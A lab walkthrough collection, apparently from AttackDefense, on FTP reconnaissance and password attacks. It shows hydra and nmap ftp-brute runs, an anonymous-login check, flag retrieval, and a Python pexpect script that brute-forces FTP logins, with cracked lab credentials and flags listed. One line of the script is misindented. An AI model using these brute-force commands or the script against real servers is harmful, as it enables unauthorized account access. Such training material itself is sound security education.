ftp-enum

Lab collection showing FTP enumeration and credential discovery techniques.

---

1

Lab 1 — FTP Brute Force and Extract Flags

Target IPs and context are shown in the commands below.

• Use hydra with user/password wordlists to check for valid credentials on the FTP server.

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp

Example hydra output:

[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.217.238.3:21/
[21][ftp] host: 192.217.238.3   login: sysadmin   password: 654321
[21][ftp] host: 192.217.238.3   login: rooty   password: qwerty
[21][ftp] host: 192.217.238.3   login: demo   password: butterfly
[21][ftp] host: 192.217.238.3   login: auditor   password: chocolate
[21][ftp] host: 192.217.238.3   login: anon   password: purple
[21][ftp] host: 192.217.238.3   login: administrator   password: tweety
[21][ftp] host: 192.217.238.3   login: diag   password: tigger
1 of 1 target successfully completed, 7 valid passwords found

Found credentials:

• sysadmin:654321

• rooty:qwerty

• demo:butterfly

• auditor:chocolate

• anon:purple

• administrator:tweety

• diag:tigger

• Use nmap ftp-brute script to confirm sysadmin's password:

echo "sysadmin" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.3

Example nmap output:

21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     sysadmin:654321 - Valid credentials
|_  Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8

• Extract the flags by logging into the FTP server with each found user and downloading the flag files:

Example FTP session:

ftp 192.217.238.3

ftp> ls
ftp> get secret.txt
ftp> exit

root@attackdefense:~# cat secret.txt

Reveal flags (from the server, per account):

• sysadmin flag: 260ca9dd8a4577fc00b7bd5810298076

• rooty flag: e529a9cea4a728eb9c5828b13b22844c

• demo flag: d6a6bc0db10694a2d90e3a69648f3a03

• auditor flag: 098f6bcd4621d373cade4e832627b4f6

• anon flag: 1bc29b36f623ba82aaf6724fd3b16718

• administrator flag: 21232f297a57a5a743894a0e4a801fc3

• diag flag: 12a032ce9179c32a6c7ab397b9d871fa

2

Lab 2 — VSFTPD Recon: Basics

• Challenge reference: VSFTPD Recon: Basics (AttackDefense)

• Target IP: 192.119.169.3

Network info (example):

ip -br -c a
	eth1@if170803   UP  192.119.169.2/24

• Target IP: 192.119.169.3

Initial discovery:

nmap 192.119.169.3
# 21/tcp open  ftp

Service/version detection:

nmap -p21 -sV -O 192.119.169.3

Example output:

21/tcp open  ftp     vsftpd 3.0.3

• FTP server version: vsftpd 3.0.3

• Check for anonymous login using nmap ftp-anon script:

nmap --script ftp-anon -p21 192.119.169.3

Example output:

21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Dec 18  2018 flag
|_drwxr-xr-x    2 ftp      ftp          4096 Dec 18  2018 pub

• Anonymous FTP login is allowed. Connect with the anonymous account and download the flag:

ftp 192.119.169.3

# Use anonymous:anonymous to login

Name (192.119.169.3:root): anonymous
    331 Please specify the password.
Password:
    230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag

Reveal flag: 4267bdfbff77d7c2635e4572519a8b9c

3

Lab 3 — VSFTPD Recon: Dictionary Attack

• Challenge reference: VSFTPD Recon: Dictionary Attack (AttackDefense)

• Target IP: 192.14.30.3

• Note: FTP server terminates the session after 3 attempts, so a custom approach may be required.

Network info (example):

ip -br -c a
	eth1@if170888   UP   192.14.30.2/24

• Target IP: 192.14.30.3

Discovery:

nmap 192.14.30.3
# 21/tcp open  ftp

Service/version detection:

nmap -p21 -sV -O 192.14.30.3
# 21/tcp open  ftp     vsftpd 3.0.3

• Example using nmap ftp-brute with a single user (billy):

echo "billy" > users

nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.3

Example output:

21/tcp open  ftp
| ftp-brute:
|   Accounts:
|     billy:carlos - Valid credentials
|_  Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5

• Discovered credential: billy:carlos

• If the server terminates sessions after 3 attempts, use a custom script that spawns a fresh FTP connection per attempt. Example Python script using pexpect (save as billy.py):

import pexpect
import sys
username=sys.argv[2]
password_dict=sys.argv[3]

# Loading the password dictionary and Stripping \n
lines = [line.rstrip('\n') for line in open(password_dict)]

itr = 0

# Iterating over dictionary
for password in lines:
	child = pexpect.spawn ('ftp '+sys.argv[1])
	child.expect ('Name .*: ')
	child.sendline (username)
    print "Trying with password: ",password
	child.expect ('Password:')
	child.sendline (password)
	i = child.expect (['Login successful', 'Login failed'])
	if i==1:
		#print('Login failed')
		child.kill(0)
	elif i==0:
		print "Login Successful for ",password
		print child.before
		break

Run the script:

python billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Example output:

Login Successful for  carlos

• Use the credential to fetch the flag via FTP:

ftp 192.14.30.3

ftp> ls
ftp> get flag
ftp> exit

root@attackdefense:~# cat flag

Reveal flag: c07c7a9be16f43bb473ed7b604295c0b

---

Last updated 3 hours ago.